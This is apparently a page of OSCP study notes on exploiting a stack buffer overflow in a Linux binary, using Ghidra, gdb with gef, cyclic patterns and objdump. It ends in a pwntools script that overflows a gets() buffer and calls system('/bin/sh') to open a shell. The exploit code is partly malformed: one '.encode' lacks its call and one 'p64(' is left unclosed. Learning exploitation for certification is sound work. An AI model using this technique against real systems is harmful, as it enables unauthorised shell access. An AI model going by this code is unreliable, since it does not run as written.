O
O
OSCP Notes
Search…
Binary exploitation
if you can download the app from sites, we can analyze them on kali!
Tool: Ghidra
New project> non-share > set a project name > Tool chest (dragon icon) > import the file.
And analyze!
  • look into functions > main and see what it's doing
local_128
gets(local_78)
puts(local_78)
  • gets and puts are vulnerable.
Try to run the app
  • make it executable with chmod +x
  • gdb ./myapp
  • download gef
  • python -c 'print "A"*112' (copy the output and paste it into the app command to test the BOF)
Does it make the app crush?
patten create 200
run with "r" command
look at registers with "registers"
You can search patten with
pattern search $rsp
create another patten with
python -c 'print "A"*120 + "B"*8 + "C"*8'
To see exactly where we see the B
From Ghidra, copy the memory address of the main function.
create a simple exploit.py
from pwn import *
context(terminal=['tmux', 'new-window'])
p= gdb.debug('./myapp', 'b main')
context(os='linux', arch='amd64')
junk = ("A" * 112).encode
bin_sh = "/bin/sh\x00".encode()
system = p64(0x40116e) # put system address
pop_r13 = p64(0x401206)
null = p64(0x0)
test = p64(0x401152(
p.recvuntil('What do you want me to echo back?')
p.sendline(junk + bin_sh + pop_r13 + system + null + null + test)
p.interactive()
-finding system address
objdump -D myapp | grep -i system
Copy link